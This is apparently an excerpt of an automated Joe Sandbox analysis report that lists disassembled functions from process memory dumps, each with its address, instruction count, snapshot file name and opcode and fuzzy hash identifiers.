                    • Opcode Fuzzy Hash: 7574dcdb28769c38c9e86a506c7c8ea32e15fe73c7a14709dba9cbe5826e2cd1
                    • Instruction Fuzzy Hash: 45519E3191DA4E8FEB98FF68C8586A9BBA1FF98340F4401BBD409D72D2DB34A841C744
                    Function 00007FF848F34F5C Relevance: .2, Instructions: 193COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ab214076a0df23fbbb75e3501d292fc631e08c976e856217be807442a2f09f7
                    • Instruction ID: e64922fa260457a7b04c9b1223b683cc6aff6ec28c03b6ded77594319bab3667
                    • Opcode Fuzzy Hash: 8ab214076a0df23fbbb75e3501d292fc631e08c976e856217be807442a2f09f7
                    • Instruction Fuzzy Hash: F271C270D19A2C9FDBA5EF58C895BE9B7F1FB58304F5001AAD00DE7291DB35AA84CB40
                    Function 00007FF848F360C5 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ec5641edd57b5291fe3e4b64d07f246ef096b80a865feb323e4e5c446ce424b
                    • Instruction ID: 4ca43260fcb7d78c02ec6f8015daeb3b8a653120d42ef48436d067e0df39f52c
                    • Opcode Fuzzy Hash: 7ec5641edd57b5291fe3e4b64d07f246ef096b80a865feb323e4e5c446ce424b
                    • Instruction Fuzzy Hash: 14517971C0CA598FEB96EB6888957AD7BB1FF55340F4401BAC009D72C2DB3C6984DB41
                    Function 00007FF848F3190D Relevance: .2, Instructions: 173COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction ID: c889798b965f0532f045d3c4d93a7625c5f30e6d53abd3118b7b0b6ab1a697aa
                    • Opcode Fuzzy Hash: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction Fuzzy Hash: D751CA71D1955D9FDB98EB58C895BA8B7B1FF58340F1440BAD00DE7296CF38A880CB04
                    Function 00007FF848F34611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee888cadb0a5b4482680249886788ed58531158d37c76532e97f11c008b4dc32
                    • Instruction ID: 14049e00d7ef5a63d8c9317c89405d96cad6abfbbb452b90acea0790b9ce0f19
                    • Opcode Fuzzy Hash: ee888cadb0a5b4482680249886788ed58531158d37c76532e97f11c008b4dc32
                    • Instruction Fuzzy Hash: 8F51B270E19A1D8FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB386941CB44
                    Function 00007FF848F30AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction ID: 809f0658bda65252b931ee3cb1367d0d1c2a7b64def4d590c15d18ee87a1c388
                    • Opcode Fuzzy Hash: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction Fuzzy Hash: 0451E370D18A5D8FDB98EF98C8986EDBBB1FFA8341F14012BD409E7295CB74A845CB44
                    Function 00007FF848F338B8 Relevance: .2, Instructions: 151COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 23614c8f35fc91d73d72a03475cf2b876e50ae78f2aa466dc403e71123563eea
                    • Instruction ID: 4bc618008f537c3a5cbbe2181ef4d330fde17c2d778c3f027637bdfc2a9b2793
                    • Opcode Fuzzy Hash: 23614c8f35fc91d73d72a03475cf2b876e50ae78f2aa466dc403e71123563eea
                    • Instruction Fuzzy Hash: 1D417970E1DA1D9FDB44EF98D855AEEBBB0FF58340F10017AD009E7281DB39A9018B55
                    Function 00007FF848F367ED Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bc09f40bbdcebf8d58a8a571aeee7e983979d93a7907334ece064b5e6d201675
                    • Instruction ID: e76040ad21920340100ec74c3fd9041efa678af41db8e8e55976cc734cab8441
                    • Opcode Fuzzy Hash: bc09f40bbdcebf8d58a8a571aeee7e983979d93a7907334ece064b5e6d201675
                    • Instruction Fuzzy Hash: 9651783180E7898FDB55AB6498682FE7BB0EF1A311F1501BBD004E71D2EB385A48DB52
                    Function 00007FF848F3535F Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8221ce8c2dcf5529fb24dc43126fb5179cf5fe40f8dff20caa16781641051e46
                    • Instruction ID: f61b3d00742270e40927eee0a66b0635c1dbbc0c6e20335872ee24e83b0d1191
                    • Opcode Fuzzy Hash: 8221ce8c2dcf5529fb24dc43126fb5179cf5fe40f8dff20caa16781641051e46
                    • Instruction Fuzzy Hash: E141E670D1895D9FDF94EBA8D895AACBBF1FF68341F50016AD00DE7296DB34A881CB40
                    Function 00007FF848F30C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d1eecab2d07f6d921dcbbfa6c4658695237a5b7eafccefa4c488b2d4d648c8a
                    • Instruction ID: b04185131d2c4144ecadd2ee0cc84e4daa6accbd5a12992fa269c2a11dfa831f
                    • Opcode Fuzzy Hash: 3d1eecab2d07f6d921dcbbfa6c4658695237a5b7eafccefa4c488b2d4d648c8a
                    • Instruction Fuzzy Hash: 52410271C09A1D8FDB80FFA8D4486EDBBB0FF55340F50046AE409E7292DB78A941CB84
                    Function 00007FF848F31521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction ID: 3ce9ae0f0bc889c1ba0d051b8ba53bf9d293bf343efe3b03bcef4eb6863704e0
                    • Opcode Fuzzy Hash: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction Fuzzy Hash: D541D634A1891D8FDF98EB58C895BACB7F1FF58344F5440AAE04EE3291DF74A9818B40
                    Function 00007FF848F30AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction ID: 3952733efa99eb53d29e263af2b8324039295f9366fb1665ca29fd00bfaac9b5
                    • Opcode Fuzzy Hash: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction Fuzzy Hash: 0A31C770D18A1D9FDF94EF58D885BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F34BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c456d41b59ce273af0828d1dd15dcce1755cd29d7c6b307f7a5f8755b3071c8
                    • Instruction ID: 1dfff77359e97b4be45ad3d458ec29910dde4083eb954b8a35391a586fff6ba3
                    • Opcode Fuzzy Hash: 9c456d41b59ce273af0828d1dd15dcce1755cd29d7c6b307f7a5f8755b3071c8
                    • Instruction Fuzzy Hash: 32417C70D0DA598FE756EBA4C8586EDBBF1FF69340F5001BAD009D7292CB385981CB40
                    Function 00007FF848F31129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction ID: 1831f3a81f698f656277480ea69a602120ad24bf07fb9db6a6501f22f22de6a4
                    • Opcode Fuzzy Hash: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction Fuzzy Hash: 40217C3190895D9FDB81EF68D855AEDBBF5FF58310F00016BE408E3291CA249841C790
                    Function 00007FF848F33A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction ID: c3d9a1e0fd0a256aca4248eb905369a6f008b040638b3d8b7591eeebeaf255d1
                    • Opcode Fuzzy Hash: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction Fuzzy Hash: C021DE72E0DA8E8FEB95EB289C642A5BBA1FF41341F0801BAD048D72D2DF396841C740
                    Function 00007FF848F34555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ab329d0269caf3eb0cbc460ab30fa210dbb6015d06ab497fd2cd15d8a3c6d56
                    • Instruction ID: 1ec2c128869eeac5127f37cd870eb14a98df88bad6c7e04aa42f058c1677df97
                    • Opcode Fuzzy Hash: 3ab329d0269caf3eb0cbc460ab30fa210dbb6015d06ab497fd2cd15d8a3c6d56
                    • Instruction Fuzzy Hash: F131CD71C1E6C98FE795EF2888142AE7FF0FFA6240F4501BBE408832D3CB2858448799
                    Function 00007FF848F33F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction ID: 5759e07d036be748c542f5c3b3754883320783fccf4dd12e483c2842513270f2
                    • Opcode Fuzzy Hash: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction Fuzzy Hash: FF314A30D0961A8FE7A8EB28C8593B9B7B1EF94350F1005BAD45DD72D2CF39A981CB44
                    Function 00007FF848F33F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction ID: 6e1b73648d3be654aa84de8a46bd408c1c58b9d7a5ab29aab687c53847492de9
                    • Opcode Fuzzy Hash: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction Fuzzy Hash: 87219D31E0D20A9EE768EB68D8456B9B3B1EF95350F10047AD51D932D2CF39A981CB44
                    Function 00007FF848F31048 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction ID: df27113ec3b048840facd19d0c22ad48332518d2f5b6236fc905511555b8a4b5
                    • Opcode Fuzzy Hash: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction Fuzzy Hash: B3219274A1891D9FDF84EF48D495EEEBBB1FF68301F10416AE509E3255CB34E8418B94
                    Function 00007FF848F33F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction ID: d11e549175d7a161452aa2c3c8ba34709b03ef6e208cb99b2aa55082e00d3c74
                    • Opcode Fuzzy Hash: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction Fuzzy Hash: A3219A30D0E7898FE769EB68C8197B9BBB0EF56350F0400BAD009D32D2CE389884CB51
                    Function 00007FF848F33FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction ID: 90ee1616f1261fb80d70e4f63fc0f983706d79182bb91efdba4ffcfe1fc8b1b2
                    • Opcode Fuzzy Hash: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction Fuzzy Hash: A411EF7090E78E4FE766AB7488247B97FB1EF96710F0804BAD049D72C3CE289844C751
                    Function 00007FF848F33F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction ID: f79f5d11ffadb5da644a9d5774be393b1c4441713a5af5ba1352b6aa2f7b4c3c
                    • Opcode Fuzzy Hash: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction Fuzzy Hash: 14119E30D0D60A9FE768EB68C4097BAB6B1EFA5790F10153AE40DD32C1CF39A8448A55
                    Function 00007FF848F33F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction ID: 8e38062f09769db64c0bd6bf2843b831148c890b329d31ba5b7d4e2bcbbed7fe
                    • Opcode Fuzzy Hash: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction Fuzzy Hash: EE114C74D0D64A8EE7A8FF68D4153B977B1EFA9790F14143AD40D972C6CF39A8818B08
                    Function 00007FF848F33F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction ID: c67585e6f566ef50767a98c6eb0adc7a1b2b3499f58b97886dc01000fd7beb40
                    • Opcode Fuzzy Hash: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction Fuzzy Hash: D3118E70D0DA4A8FE7A8EF68C4153B9B7B1EF98750F54043AD40DD72C2CF39A8818648
                    Function 00007FF848F33EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction ID: cd71f1c24c82e119973dd14bd70e1059ca1edd7a327691b2d0d062028a86ca1a
                    • Opcode Fuzzy Hash: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction Fuzzy Hash: EC11A070D0E74A8FE769EB28C5193B9BBB1EF56750F04147AE419D72D2CF3968408705
                    Function 00007FF848F33F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction ID: 0b8aeb4af75e0a14b7f351bf0bcfc3ea94ac8e69750e3d0b95e95ea1c28b2391
                    • Opcode Fuzzy Hash: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction Fuzzy Hash: DD016970D0E64A8FE768EB64C5193B9BBB1EF99750F04187AD009E72D2CF39A8418B15
                    Function 00007FF848F36680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction ID: 30463fb7bfb9c4b512ad0f9d62fe240f32766ec263851ee5595ecf5af819dba7
                    • Opcode Fuzzy Hash: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction Fuzzy Hash: 4301DC31C48A4C8FCB54EF1AAC002D877B4FB9A318F00026AD44CD7180E3759A9ACB45
                    Function 00007FF848F310EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction ID: bbbe37285ffb19ffa4420ce6195e9bf2e2969118bc2c2eb8c7a26f5191e8e657
                    • Opcode Fuzzy Hash: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction Fuzzy Hash: FBE09236D0C94D4FEB91BF68A8076E5BBA4FB8A308F00007AE55CC3191C7259595C785

                    Executed Functions

                    Function 00007FF848F11EC3 Relevance: 15.3, Strings: 11, Instructions: 1538COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$[$[$\$]$]$u${${$}$}
                    • API String ID: 0-3490533229
                    • Opcode ID: 726cf57831c88f10680fb56a547011c24e92427dd3cd006398f07a8cc99045f2
                    • Instruction ID: 35217f87abdeea07d151d10d0b750b49c4f6262e688aef347c043fdc2193fc34
                    • Opcode Fuzzy Hash: 726cf57831c88f10680fb56a547011c24e92427dd3cd006398f07a8cc99045f2
                    • Instruction Fuzzy Hash: 56D2B170D196298FDBA8EF28C8947A9B7B1FF58341F5041AAD00DE3291DB35AE81CF54
                    Function 00007FF848F1124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 9aa3557388cb36c074888d310f5c61d8b4dd5e89555f784a2428b45d33ebca8b
                    • Instruction ID: 91463032669bed8e44540c8f5c1449f027028463ba14138258242ca34020d177
                    • Opcode Fuzzy Hash: 9aa3557388cb36c074888d310f5c61d8b4dd5e89555f784a2428b45d33ebca8b
                    • Instruction Fuzzy Hash: C2A17374A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AC81CB00
                    Function 00007FF848F109D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: 686802ba9dec26f90103f2d1d824a66fb67f7da0ff31a4ff76c265efe56d2c69
                    • Instruction ID: 0f2f9ed58f10d096eecf99ba20489972fc99a16b9a0bd5b46391c2233003b65a
                    • Opcode Fuzzy Hash: 686802ba9dec26f90103f2d1d824a66fb67f7da0ff31a4ff76c265efe56d2c69
                    • Instruction Fuzzy Hash: 8DE01A31D1892E8EDB44FB58D8555FCB361FB94340F00042AD40DD3181DB206C14D784
                    Function 00007FF848F11751 Relevance: .4, Instructions: 401COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e97e5836fc8af25469e4125dd6985bbd24d9d69bbe9d382ba26687d2de2a4c0
                    • Instruction ID: 71dda67503e62656229dea1bf872d7466ff297688cc3eaf045617c38c3cebbf8
                    • Opcode Fuzzy Hash: 6e97e5836fc8af25469e4125dd6985bbd24d9d69bbe9d382ba26687d2de2a4c0
                    • Instruction Fuzzy Hash: 98E18A71D1965A9FEB58EB68C8657F8BBB1FF55340F0440BAD00DE3292CB386885CB15
                    Function 00007FF848F14843 Relevance: .2, Instructions: 249COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f58b128d772463475e0ad0f06b959aed96ae15928821f1c1eb1a87b2550ca55
                    • Instruction ID: 178804f003522d8d956d7ee9b02acc740cf272583b64052c4dd32d5b95a778ae
                    • Opcode Fuzzy Hash: 8f58b128d772463475e0ad0f06b959aed96ae15928821f1c1eb1a87b2550ca55
                    • Instruction Fuzzy Hash: 1091D370D19A1D9FDB94EFA8C845BADBBB1FF58340F5041AAD00DE3292DB3869858B44
                    Function 00007FF848F11831 Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e2ffe0461bc504c522382719efae6efdce49eea17c7985c57cf99ca949e70c5
                    • Instruction ID: 6fa0c3237c7bc597967277abb76659e00419ef1cf79fd2866a92e138ce022a84
